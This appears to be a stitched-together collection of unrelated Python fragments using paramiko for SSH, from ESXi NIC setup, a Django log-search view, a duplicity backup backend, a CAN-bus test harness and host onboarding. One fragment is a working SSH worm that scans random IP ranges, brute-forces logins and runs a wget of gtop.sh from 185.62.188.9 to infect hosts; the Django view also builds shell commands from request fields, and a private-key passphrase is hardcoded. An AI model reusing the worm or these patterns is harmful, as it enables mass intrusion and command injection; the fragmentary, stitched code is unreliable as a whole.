raise cherrypy.HTTPError("403 Remote authentication failed.")
ssh.get_transport().set_keepalive(5)
cert_file_object.close()
key_file_object.close()
return ssh
def _create_handler(self):
self._handler = paramiko.SSHClient()
self._handler.load_system_host_keys()
self._handler.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def add_sriov_nics(args, vm, si_content):
dvs = get_obj(si_content, [vim.DistributedVirtualSwitch], args.sriov_dvs)
fix_sriov_pg(si_content, dvs, args.sriov_dvs_pg)
sr_iov_nic_list = args.sriov_nics.rstrip(',')
sr_iov_nic_list = sr_iov_nic_list.split(',')
if vm.runtime.powerState == vim.VirtualMachinePowerState.poweredOn:
print "VM:%s is powered ON. Cannot do hot pci add now. Shutting it down" % (
args.vm_name)
poweroffvm(vm)
# get pci id of the sriov nic
ssh_handle = paramiko.SSHClient()
ssh_handle.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_handle.connect(args.esxi_host,
username=args.esxi_user,
password=args.esxi_password)
cmd = "vmware -v"
stdin, stdout, stderr = ssh_handle.exec_command(cmd)
err = stderr.read()
op = stdout.read()
if err:
self.log_and_raise_exception(err)
esxi_version = op.split()[2][:3]
for sr_iov_nic in sr_iov_nic_list:
cmd = "vmkchdev -l | grep %s" % sr_iov_nic
stdin, stdout, stderr = ssh_handle.exec_command(cmd)
err = stderr.read()
op = stdout.read()
if err:
self.log_and_raise_exception(err)
nic_info = str(op)
if len(nic_info) == 0:
raise Exception(
"Unable to add sriov interface for physical nic %s \
on esxi host %s" % (sr_iov_nic, args.esxi_host))
pci_id = nic_info.split()[0]
if (esxi_version == '5.5'):
pci_id = pci_id[5:]
mac_address = None
devices = []
nicspec = vim.vm.device.VirtualDeviceSpec()
nicspec.device = vim.vm.device.VirtualSriovEthernetCard()
nicspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
nicspec.device.wakeOnLanEnabled = True
nicspec.device.allowGuestOSMtuChange = True
nicspec.device.deviceInfo = vim.Description()
pg_obj = get_obj(si_content, [vim.dvs.DistributedVirtualPortgroup],
args.sriov_dvs_pg)
dvs_port_connection = vim.dvs.PortConnection()
dvs_port_connection.portgroupKey = pg_obj.key
dvs_port_connection.switchUuid = pg_obj.config.distributedVirtualSwitch.uuid
nicspec.device.backing = vim.vm.device.VirtualEthernetCard.DistributedVirtualPortBackingInfo(
)
nicspec.device.backing.port = dvs_port_connection
nicspec.device.sriovBacking = vim.vm.device.VirtualSriovEthernetCard.SriovBackingInfo(
)
nicspec.device.sriovBacking.physicalFunctionBacking = vim.vm.device.VirtualPCIPassthrough.DeviceBackingInfo(
)
nicspec.device.sriovBacking.physicalFunctionBacking.id = pci_id
if (mac_address):
nicspec.device.addressType = "Manual"
nicspec.device.macAddress = mac_address
devices.append(nicspec)
vmconf = vim.vm.ConfigSpec(deviceChange=devices)
task = vm.ReconfigVM_Task(vmconf)
wait_for_task(task)
if not mac_address:
for device in vm.config.hardware.device:
if isinstance(device, vim.vm.device.VirtualSriovEthernetCard):
devices = []
mac_address = device.macAddress
nicspec = vim.vm.device.VirtualDeviceSpec()
nicspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.edit
nicspec.device = device
nicspec.device.addressType = "Manual"
nicspec.device.macAddress = mac_address
devices.append(nicspec)
vmconf = vim.vm.ConfigSpec(deviceChange=devices)
task = vm.ReconfigVM_Task(vmconf)
wait_for_task(task)
def clusterSpeed(req):
if req.method == 'POST':
operatorName = req.session.get('username')
user_id = req.REQUEST.get('user_id', '0').strip()
print(user_id)
search1 = req.REQUEST.get('search1', '0')
search2 = req.REQUEST.get('search2', '0')
nowDate = time.strftime('%Y-%m-%d')
startTime = req.REQUEST.get('startTime', nowDate)
type = req.REQUEST.get('type', 'cluster_64')
now = time.strftime('%Y%m%d%H%M%S')
file = "/hskj/tmp/ClusterSpeed/" + user_id + "_" + now + ".txt"
if startTime == "":
startTime = nowDate
if search1 == "nowtype":
if search2 == "smgp":
logName = "/hskj/logs/smgp_info.log"
command = "tail -100000 " + logName + " | grep -a '" + user_id + "' |grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
elif search2 == "cmpp":
logName = "/hskj/logs/cmpp_info.log"
command = "tail -100000 " + logName + " | grep -a '" + user_id + "' |grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
elif search2 == "sgip":
logName = "/hskj/logs/sgip_info.log"
command = "tail -100000 " + logName + " | grep -a '" + user_id + "' |grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
else:
logName = "/hskj/logs/info.log"
command = "tail -100000 " + logName + " | grep -a '" + user_id + "' |grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
print("logName=" + logName)
print(command)
else:
if startTime == nowDate:
if search2 == "smgp":
logName = "/hskj/logs/smgp_info.log"
command = "grep -a '" + user_id + "' " + logName + " | grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c | sort -k1 -nr | head -20"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
elif search2 == "cmpp":
logName = "/hskj/logs/cmpp_info.log"
command = "grep -a '" + user_id + "' " + logName + " | grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c | sort -k1 -nr | head -20"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
elif search2 == "sgip":
logName = "/hskj/logs/sgip_info.log"
command = "grep -a '" + user_id + "' " + logName + " | grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c | sort -k1 -nr | head -20"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
else:
logName = "/hskj/logs/info.log"
command = "grep -a '" + user_id + "' " + logName + " | grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c | sort -k1 -nr | head -20"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
else:
if search2 == "smgp":
logName = "/hskj/logs/smgp_info.log." + startTime
command = "grep -a '" + user_id + "' " + logName + " | grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c | sort -k1 -nr | head -20"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
elif search2 == "cmpp":
logName = "/hskj/logs/cmpp_info.log." + startTime
command = "grep -a '" + user_id + "' " + logName + " | grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c | sort -k1 -nr | head -20"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
elif search2 == "sgip":
logName = "/hskj/logs/sgip_info.log." + startTime
command = "grep -a '" + user_id + "' " + logName + " | grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c | sort -k1 -nr | head -20"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
else:
logName = "/hskj/logs/info.log." + startTime
command = "grep -a '" + user_id + "' " + logName + " | grep -a 'submitResp' | awk -F \",\" '{print $1}' | sort | uniq -c | sort -k1 -nr | head -20"
cmd = "awk '{a[$3]+=$1}END{for(i in a){print a[i]\" \"$2\" \"i}}' " + file + " | sort -k2 -r"
if type == "cluster_64":
server_list = {
"c1_56": ["210.14.134.81", 10056],
"c1_57": ["210.14.134.81", 10057],
"c1_58": ["210.14.134.81", 10058]
}
elif type == "cluster_227":
server_list = {
"c2_24": ["202.108.253.227", 10024],
"c2_25": ["202.108.253.227", 10025],
"c2_33": ["202.108.253.227", 10033],
"c2_34": ["202.108.253.227", 10034]
}
elif type == "cluster_35":
server_list = {
"c3_61": ["36.110.168.35", 10061],
"c3_62": ["36.110.168.35", 10062],
"c3_63": ["36.110.168.35", 10063]
}
else:
server_list = {
"c4_61": ["111.13.124.226", 10061],
"c4_62": ["111.13.124.226", 10062],
"c4_63": ["111.13.124.226", 10063]
}
f = open(file, 'a')
for line in server_list.values():
server = line[0]
port = line[1]
username = '******'
pkey_file = '/home/bjywb/.ssh/hskj_20130620_bjywb'
s = paramiko.SSHClient()
s.load_system_host_keys()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
key = paramiko.RSAKey.from_private_key_file(
pkey_file, "&U*I(O1208")
s.connect(server, port, username, pkey=key, timeout=10)
stdin, stdout, stderr = s.exec_command(command)
for result in stdout.readlines():
f.write(result)
f.close()
print(cmd)
table_list = []
for result in os.popen(cmd).readlines():
table_list.append({"content": result})
return render_to_response("ClusterSpeed.html", locals())
else:
return render_to_response("ClusterSpeed.html", locals())
def __init__(self, parsed_url):
global paramiko
duplicity.backend.Backend.__init__(self, parsed_url)
self.retry_delay = 10
if parsed_url.path:
# remove first leading '/'
self.remote_dir = re.sub(r'^/', r'', parsed_url.path, 1)
else:
self.remote_dir = u'.'
# lazily import paramiko when we need it
# debian squeeze's paramiko is a bit old, so we silence randompool
# depreciation warning note also: passphrased private keys work with
# squeeze's paramiko only if done with DES, not AES
import warnings
warnings.simplefilter(u"ignore")
try:
import paramiko
except ImportError:
raise
warnings.resetwarnings()
class AgreedAddPolicy (paramiko.AutoAddPolicy):
u"""
Policy for showing a yes/no prompt and adding the hostname and new
host key to the known host file accordingly.
This class simply extends the AutoAddPolicy class with a yes/no
prompt.
"""
def missing_host_key(self, client, hostname, key):
fp = hexlify(key.get_fingerprint())
fingerprint = u':'.join(a + b for a, b in list(zip(fp[::2], fp[1::2])))
question = u"""The authenticity of host '%s' can't be established.
%s key fingerprint is %s.
Are you sure you want to continue connecting (yes/no)? """ % (hostname,
key.get_name().upper(),
fingerprint)
while True:
sys.stdout.write(question)
choice = input().lower()
if choice in [u'yes', u'y']:
paramiko.AutoAddPolicy.missing_host_key(self, client,
hostname, key)
return
elif choice in [u'no', u'n']:
raise AuthenticityException(hostname)
else:
question = u"Please type 'yes' or 'no': "
class AuthenticityException (paramiko.SSHException):
def __init__(self, hostname):
paramiko.SSHException.__init__(self,
u'Host key verification for server %s failed.' %
hostname)
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(AgreedAddPolicy())
# paramiko uses logging with the normal python severity levels,
# but duplicity uses both custom levels and inverted logic...*sigh*
self.client.set_log_channel(u"sshbackend")
ours = paramiko.util.get_logger(u"sshbackend")
dest = logging.StreamHandler(sys.stderr)
dest.setFormatter(logging.Formatter(u'ssh: %(message)s'))
ours.addHandler(dest)
# ..and the duplicity levels are neither linear,
# nor are the names compatible with python logging,
# eg. 'NOTICE'...WAAAAAH!
plevel = logging.getLogger(u"duplicity").getEffectiveLevel()
if plevel <= 1:
wanted = logging.DEBUG
elif plevel <= 5:
wanted = logging.INFO
elif plevel <= 7:
wanted = logging.WARNING
elif plevel <= 9:
wanted = logging.ERROR
else:
wanted = logging.CRITICAL
ours.setLevel(wanted)
# load known_hosts files
# paramiko is very picky wrt format and bails out on any problem...
try:
if os.path.isfile(u"/etc/ssh/ssh_known_hosts"):
self.client.load_system_host_keys(u"/etc/ssh/ssh_known_hosts")
except Exception as e:
raise BackendException(u"could not load /etc/ssh/ssh_known_hosts, "
u"maybe corrupt?")
try:
# use load_host_keys() to signal it's writable to paramiko
# load if file exists or add filename to create it if needed
file = os.path.expanduser(u'~/.ssh/known_hosts')
if os.path.isfile(file):
self.client.load_host_keys(file)
else:
self.client._host_keys_filename = file
except Exception as e:
raise BackendException(u"could not load ~/.ssh/known_hosts, "
u"maybe corrupt?")
u""" the next block reorganizes all host parameters into a
dictionary like SSHConfig does. this dictionary 'self.config'
becomes the authorative source for these values from here on.
rationale is that it is easiest to deal wrt overwriting multiple
values from ssh_config file. (ede 03/2012)
"""
self.config = {u'hostname': parsed_url.hostname}
# get system host config entries
self.config.update(self.gethostconfig(u'/etc/ssh/ssh_config',
parsed_url.hostname))
# update with user's config file
self.config.update(self.gethostconfig(u'~/.ssh/config',
parsed_url.hostname))
# update with url values
# username from url
if parsed_url.username:
self.config.update({u'user': parsed_url.username})
# username from input
if u'user' not in self.config:
self.config.update({u'user': getpass.getuser()})
# port from url
if parsed_url.port:
self.config.update({u'port': parsed_url.port})
# ensure there is deafult 22 or an int value
if u'port' in self.config:
self.config.update({u'port': int(self.config[u'port'])})
else:
self.config.update({u'port': 22})
# parse ssh options for alternative ssh private key, identity file
m = re.search(r"^(?:.+\s+)?(?:-oIdentityFile=|-i\s+)(([\"'])([^\\2]+)\\2|[\S]+).*",
globals.ssh_options)
if (m is not None):
keyfilename = m.group(3) if m.group(3) else m.group(1)
self.config[u'identityfile'] = keyfilename
# ensure ~ is expanded and identity exists in dictionary
if u'identityfile' in self.config:
if not isinstance(self.config[u'identityfile'], list):
# Paramiko 1.9.0 and earlier do not support multiple
# identity files when parsing config files and always
# return a string; later versions always return a list,
# even if there is only one file given.
#
# All recent versions seem to support *using* multiple
# identity files, though, so to make things easier, we
# simply always use a list.
self.config[u'identityfile'] = [self.config[u'identityfile']]
self.config[u'identityfile'] = [
os.path.expanduser(i) for i in self.config[u'identityfile']]
else:
self.config[u'identityfile'] = None
# get password, enable prompt if askpass is set
self.use_getpass = globals.ssh_askpass
# set url values for beautiful login prompt
parsed_url.username = self.config[u'user']
parsed_url.hostname = self.config[u'hostname']
password = self.get_password()
try:
self.client.connect(hostname=self.config[u'hostname'],
port=self.config[u'port'],
username=self.config[u'user'],
password=password,
allow_agent=True,
look_for_keys=True,
key_filename=self.config[u'identityfile'])
except Exception as e:
raise BackendException(u"ssh connection to %s@%s:%d failed: %s" % (
self.config[u'user'],
self.config[u'hostname'],
self.config[u'port'], e))
self.client.get_transport().set_keepalive((int)(old_div(globals.timeout, 2)))
self.scheme = duplicity.backend.strip_prefix(parsed_url.scheme,
u'paramiko')
self.use_scp = (self.scheme == u'scp')
# scp or sftp?
if (self.use_scp):
# sanity-check the directory name
if (re.search(u"'", self.remote_dir)):
raise BackendException(u"cannot handle directory names with single quotes with scp")
# make directory if needed
self.runremote(u"mkdir -p '%s'" % (self.remote_dir,), False, u"scp mkdir ")
else:
try:
self.sftp = self.client.open_sftp()
except Exception as e:
raise BackendException(u"sftp negotiation failed: %s" % e)
# move to the appropriate directory, possibly after creating it and its parents
dirs = self.remote_dir.split(os.sep)
if len(dirs) > 0:
if not dirs[0]:
dirs = dirs[1:]
dirs[0] = u'/' + dirs[0]
for d in dirs:
if (d == u''):
continue
try:
attrs = self.sftp.stat(d)
except IOError as e:
if e.errno == errno.ENOENT:
try:
self.sftp.mkdir(d)
except Exception as e:
raise BackendException(u"sftp mkdir %s failed: %s" %
(self.sftp.normalize(u".") + u"/" + d, e))
else:
raise BackendException(u"sftp stat %s failed: %s" %
(self.sftp.normalize(u".") + u"/" + d, e))
try:
self.sftp.chdir(d)
except Exception as e:
raise BackendException(u"sftp chdir to %s failed: %s" %
(self.sftp.normalize(u".") + u"/" + d, e))
def __init__(self, url, user):
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.client.load_system_host_keys()
self.client.connect(url, username=user)
def run(self):
while 1:
try:
while 1:
thisipisbad = 'no'
if ipclassinfo == "A":
self.host = ip1 + '.' + str(random.randrange(
0, 256)) + '.' + str(random.randrange(
0, 256)) + '.' + str(random.randrange(0, 256))
elif ipclassinfo == "B":
self.host = ip1 + '.' + ip2 + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256))
elif ipclassinfo == "C":
self.host = ip1 + '.' + ip2 + '.' + ip3 + '.' + str(
random.randrange(0, 256))
elif ipclassinfo == "BRAZIL":
br = [
"179.105", "179.152", "189.29", "189.32", "189.33",
"189.34", "189.35", "189.39", "189.4", "189.54",
"189.55", "189.60", "189.61", "189.62", "189.63",
"189.126"
]
self.host = random.choice(br) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256))
elif ipclassinfo == "SUPER":
yeet = [
"122", "131", "161", "37", "186", "187", "31",
"188", "201", "2", "200"
]
self.host = random.choice(yeet) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256))
elif ipclassinfo == "LUCKY":
lucky = [
"125.24", "125.25", "125.26", "125.27", "125.28",
"113.53", "101.51", "101.108", "118.175",
"118.173", "182.52", "180.180"
]
self.host = random.choice(lucky) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256))
elif ipclassinfo == "LUCKY2":
lucky2 = [
"122.178", "122.170", "182.65", "182.68", "182.70",
"182.75", "186.112", "186.113", "186.114",
"186.115", "186.116", "186.118"
]
self.host = random.choice(lucky2) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256))
elif ipclassinfo == "RAND":
self.host = str(random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256))
elif ipclassinfo == "INTERNET":
lol = ["1"]
self.host = random.choice(lol) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256))
else:
self.host = str(random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256)) + '.' + str(
random.randrange(0, 256))
for badip in blacklist:
if badip in self.host:
thisipisbad = 'yes'
if thisipisbad == 'no':
break
username = '******'
password = ""
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((self.host, port))
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak = False
for passwd in passwords:
if ":n/a" in passwd:
password = ""
else:
password = passwd.split(":")[1]
if "n/a:" in passwd:
username = ""
else:
username = passwd.split(":")[0]
try:
ssh.connect(self.host,
port=port,
username=username,
password=password,
timeout=3)
dobreak = True
break
except:
pass
if True == dobreak:
break
badserver = True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver = False
if badserver == False:
print 'Found ' + self.host + '|' + username + '|' + password + '|' + str(
port)
ssh.exec_command(
"cd /tmp; rm -rf *; wget -q http://185.62.188.9/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -f *"
)
infectedipz = open("vuln.txt",
"a").write(username + ":" + password +
":" + self.host + "\n")
time.sleep(20)
ssh.close()
except:
pass
from PIL import Image
dpi = 100
sizex = 800
sizey = 600
yRange = 0.1
hystType = [1440, 360, 180, 60]
band = {'low': [1, 20], 'high': [20, 50]}
rTWindow = 360
rtSft = 2
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(hostname='80.211.98.179',
username='******',
password='******')
sftp = ssh_client.open_sftp()
inv = read_inventory("metadata/Braskem_metadata.xml")
class drumPlot(Client):
_traces = Stream()
_inv = inv
_rtSft = rtSft
_lastData = UTCDateTime.now()
_traces = Stream()
_appTrace = Stream()
def run_measurement(starttime_string, cangen_delay, runtime):
print("\n" + "*"*100)
print("\nStarting the measurement for cangen delay {} milliseconds (runtime {} s).".format(cangen_delay, runtime))
number_of_frames = int(runtime * MILLISECONDS_PER_SECOND / cangen_delay)
top_monitoring_time = max(runtime - 2 * settings.DELAY_MONITOR_START, 0) # Finish monitoring before runtime ends
top_number_of_samples = math.floor(min(settings.TOP_WANTED_NUMBER_OF_SAMPLES,
(top_monitoring_time/settings.TOP_MINIMUM_DELAY)+1))
if not top_number_of_samples:
raise ValueError("Wrong settings for the top command, monitor start delay and runtime (no top samples will be used)")
if top_number_of_samples == 1:
top_delay = 1 # Whatever
else:
top_delay = math.floor(top_monitoring_time/(top_number_of_samples - 1)) # seconds. Might be 1 s shorter than TOP_MINIMUM_DELAY
## Create output directory ##
measurementdata_dir = os.path.join(THIS_DIRECTORY, "_measurementdata")
os.makedirs(measurementdata_dir, exist_ok=True)
subdir1name = "md-{}".format(starttime_string)
subdir1 = os.path.join(measurementdata_dir, subdir1name)
os.makedirs(subdir1, exist_ok=True)
subdir2name = "md-{}-g{:.3f}-n{}".format(starttime_string, cangen_delay, number_of_frames).replace('.', '_')
outputdir = os.path.join(subdir1, subdir2name)
os.makedirs(outputdir)
os.chdir(outputdir)
print("Output directory:", outputdir)
## Generate commands ##
command_cansetup_sender = settings.COMMAND_TEMPLATE_CANSETUP_REAL.format(
caninterface=settings.CAN_SENDER_INTERFACE_NAME,
bitrate=settings.CAN_BITRATE)
command_cansetup_receiver = settings.COMMAND_TEMPLATE_CANSETUP_REAL.format(
caninterface=settings.CAN_RECEIVER_INTERFACE_NAME,
bitrate=settings.CAN_BITRATE)
command_cangen = settings.COMMAND_TEMPLATE_CANGEN.format(caninterface=settings.CAN_SENDER_INTERFACE_NAME,
delay=cangen_delay,
frame_id=settings.CAN_FRAME_ID,
number_of_frames=number_of_frames)
command_candump = settings.COMMAND_TEMPLATE_CANDUMP.format(caninterface=settings.CAN_RECEIVER_INTERFACE_NAME)
command_canbusload = settings.COMMAND_TEMPLATE_CANBUSLOAD.format(caninterface=settings.CAN_RECEIVER_INTERFACE_NAME,
bitrate=settings.CAN_BITRATE,
filename=settings.FILENAME_CANBUSLOAD)
command_canadapter = settings.COMMAND_TEMPLATE_CANADAPTER.format(caninterface=settings.CAN_RECEIVER_INTERFACE_NAME)
command_mosquitto_sub = settings.COMMAND_TEMPLATE_MOSQUITTO_SUB.format(topic=settings.MQTT_SUBSCRIPTION_TOPIC,
filename=settings.FILENAME_MOSQUITTO_SUB)
command_mqtt_log_length = settings.COMMAND_TEMPLATE_MQTT_LOG_LENTH.format(
inputfilename=settings.FILENAME_MOSQUITTO_SUB,
outputfilename=settings.FILENAME_MQTT_LOG_LENGTH,
sleeptime=settings.MQTT_FILELENGTH_SAMPLE_INTERVAL)
command_top = settings.COMMAND_TEMPLATE_TOP.format(numberofsamples=top_number_of_samples,
delay=top_delay,
filename=settings.FILENAME_TOP)
command_cpufreq = settings.COMMAND_TEMPLATE_CPUFREQ.format(filename=settings.FILENAME_CPUFREQ)
command_ifconfig = settings.COMMAND_TEMPLATE_IFCONFIG.format(filename=settings.FILENAME_IFCONFIG)
command_ps = settings.COMMAND_TEMPLATE_PS.format(filename=settings.FILENAME_PS)
command_uname = settings.COMMAND_TEMPLATE_UNAME.format(filename=settings.FILENAME_UNAME)
command_linuxdistribution = settings.COMMAND_TEMPLATE_LINUXDISTRIBUTION.format(
filename=settings.FILENAME_LINUXDISTRIBUTION)
## Write commands to logfile ##
command_variable_names = sorted([x for x in list(locals()) if x.startswith("command_")])
all_commands_string = ""
for name in command_variable_names:
all_commands_string += "{} {}\n".format(name, locals()[name])
with open(settings.FILENAME_COMMANDS, 'w') as commandfile:
commandfile.write(all_commands_string)
#### Start up CAN receiving #####
processes = {}
print("\n\n ** Start CAN receiver setup ** ")
#process_cansetup_receiver = subprocess.Popen([command_cansetup_receiver], shell=True) check return code! TODO
#process_cansetup_sender = subprocess.Popen([command_cansetup_sender], shell=True) check return code! TODO
print(" --> Running:", command_cpufreq)
pr = subprocess.Popen([command_cpufreq], shell=True, preexec_fn=os.setsid)
pr.wait()
print(" --> Running:", command_ps)
pr = subprocess.Popen([command_ps], shell=True, preexec_fn=os.setsid)
pr.wait()
print(" --> Running:", command_uname)
pr = subprocess.Popen([command_uname], shell=True, preexec_fn=os.setsid)
pr.wait()
print(" --> Running:", command_linuxdistribution)
pr = subprocess.Popen([command_linuxdistribution], shell=True, preexec_fn=os.setsid)
pr.wait()
time.sleep(settings.DELAY_CAN_SETUP)
print(" --> Running:", command_ifconfig)
pr = subprocess.Popen([command_ifconfig], shell=True, preexec_fn=os.setsid)
pr.wait()
print(" --> Running:", command_candump)
processes['candump'] = subprocess.Popen([command_candump], shell=True, preexec_fn=os.setsid, stderr=subprocess.PIPE) # Suppress stderr
print(" --> Running:", command_mosquitto_sub)
processes['mosquitto_sub'] = subprocess.Popen([command_mosquitto_sub], shell=True, preexec_fn=os.setsid)
time.sleep(settings.DELAY_MQTT_LOG_LENGTH_START)
print(" --> Running:", command_mqtt_log_length)
processes['mqtt_log_length'] = subprocess.Popen([command_mqtt_log_length], shell=True, preexec_fn=os.setsid)
print(" --> Running:", command_canadapter)
processes['canadapter'] = subprocess.Popen([command_canadapter], shell=True, preexec_fn=os.setsid)
#### Start up CAN sending #####
time.sleep(settings.DELAY_CAN_SENDER_START)
print("\n\n ** Start CAN sender ** ")
if settings.USE_REMOTE_CAN_SENDER:
print(" --> Running on remote machine:", command_cangen)
can_sender_machine = paramiko.SSHClient()
can_sender_machine.set_missing_host_key_policy(paramiko.AutoAddPolicy())
can_sender_machine.connect(settings.CAN_SENDER_HOST,
username=settings.CAN_SENDER_USERNAME,
password=settings.CAN_SENDER_PASSWORD)
_, cangen_stdout, cangen_stderr = can_sender_machine.exec_command(command_cangen)
else:
print(" --> Running on local machine:", command_cangen)
processes['cangen'] = subprocess.Popen([command_cangen], shell=True, preexec_fn=os.setsid)
#### Run, and monitor ####
time.sleep(settings.DELAY_MONITOR_START)
print(" \n\n ** Start monitoring **")
print(" Top monitoring time: {} s".format(top_monitoring_time))
print(" --> Running:", command_top)
processes['top'] = subprocess.Popen([command_top], shell=True, preexec_fn=os.setsid)
print(" --> Running:", command_canbusload)
processes['canbusload'] = subprocess.Popen([command_canbusload], shell=True, preexec_fn=os.setsid)
## Wait for completion ##
print("\n\n ** Waiting for completion. Runtime: {} s **".format(runtime))
try:
time.sleep(runtime - settings.DELAY_MONITOR_START)
except KeyboardInterrupt:
print("KeyboardInterrupt. Stopping early ...")
pass
if settings.USE_REMOTE_CAN_SENDER:
print(" Wait for remote sender ...")
try:
cangen_stdout.readlines() # Blocks until the command is finished
except KeyboardInterrupt:
print("KeyboardInterrupt. Remote sender is still running!")
pass
#### Shutdown ####
print("\n\n ** Waiting for shutdown. Shutdown delay: {} s **".format(settings.DELAY_SHUTDOWN))
time.sleep(settings.DELAY_SHUTDOWN)
for proc in processes.values():
os.killpg(proc.pid, signal.SIGINT)
proc.terminate()
print("\n\nThe measurement for cangen delay {} milliseconds (runtime {} s) is now finished.\n".format(cangen_delay, runtime))
def addNewComputer(computerIP: str, username: str,
password: str) -> pref.Error:
'''
adds a new computer with using its username and password
@param computerIP:str ip of the computer to add as a string.
@param username:str username of the computer not user adding the computer.
@param password:str password of the user described above.
@return err
'''
#init values
err = pref.Success
ssh = None
ftp_client = None
remoteFolder = None
stdin = None
stdout = None
stderr = None
for _ in range(1):
#make sure ip isnt Blacklisted
blackListFileName = pref.getNoCheck(pref.CONFIG_BLACKLIST_IP_FILE)
if (blackListFileName != ""):
blackList = None
try:
blackList = [
line.rstrip("\n") for line in open(blackListFileName)
]
except:
tempErr = pref.getError(pref.ERROR_FILE_NOT_FOUND,
args=(blackListFileName))
logger.error(tempErr)
break
err = whitelistBlackList.confirmValidIP(computerIP, blackList)
if (err != pref.Success):
logger.error(err)
break
else:
logger.warning("no ip blacklist no filtering")
#get shh public key
sshKey = pref.getNoCheck(pref.CONFIG_PUBLIC_SSH_KEY)
#if its empty row public sshkey empty
if (sshKey == None or sshKey.strip().strip("\n") == ""):
err = pref.getError(pref.ERROR_EMPTY_SSH_PUBLIC_KEY)
logger.error(err)
break
#Create ssh client with basic autoadd settings
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#Connects to computer with password and username
try:
ssh.connect(computerIP,
username=username,
password=password,
timeout=5,
look_for_keys=False,
allow_agent=False)
ftp_client = ssh.open_sftp()
#Incorrect username or password
except paramiko.ssh_exception.AuthenticationException as e:
err = pref.getError(pref.ERROR_SSH_AUTHENTICATION_FAILED,
args=(username, computerIP))
logger.error(err)
break
#Connection timed out or port rejected.
except:
err = pref.getError(pref.ERROR_CONNECTION_FAILED,
args=(username, computerIP))
logger.error(err)
break
#Create tempfolder on the remote computer.
remoteFolder = pref.getNoCheck(pref.CONFIG_REMOTE_FOLDER)
addSSHKeyScript = pref.getNoCheck(pref.CONFIG_ADD_COMPUTER_SCRIPT)
resFolder = pref.getNoCheck(pref.CONFIG_RES_FOLDER)
#Add ssh file to server and change permissions.
err = copyFileToComputer(ftp_client, remoteFolder, resFolder,
addSSHKeyScript)
if (err != pref.Success):
break
#Run setup script with sshKey config file.
try:
stdin, stdout, stderr = ssh.exec_command(
"sshkey=\"{}\" {}{} > /dev/null; echo $?".format(
sshKey, remoteFolder, addSSHKeyScript))
except:
#failed to execute script.
err = pref.getError(pref.ERROR_SSH_FAILED_TO_EXECUTE_SCRIPT,
args=(addSSHKeyScript))
logger.error(err)
break
#Check error code of script.
errCode = "".join(stdout.readlines()).rstrip("\n")
if (errCode != "0"):
err = pref.getError(
pref.ERROR_SSH_SCRIPT_FAILED_WITH_ERROR_CODE,
args=(errCode))
logger.error(err)
return err
def commandissue(command_to_issue):
ssh_stdin, ssh_stdout, ssh_stderr = sshsession.exec_command(command_to_issue)
return ssh_stdout.read()
# my commands
print("Servers available: 10.10.2.3, 10.10.2.4, 10.10.2.5")
ser_ver = input('What is the server IP?: ')
user_name = input('What is the username?: ')
pass_word = input('What is the password?: ')
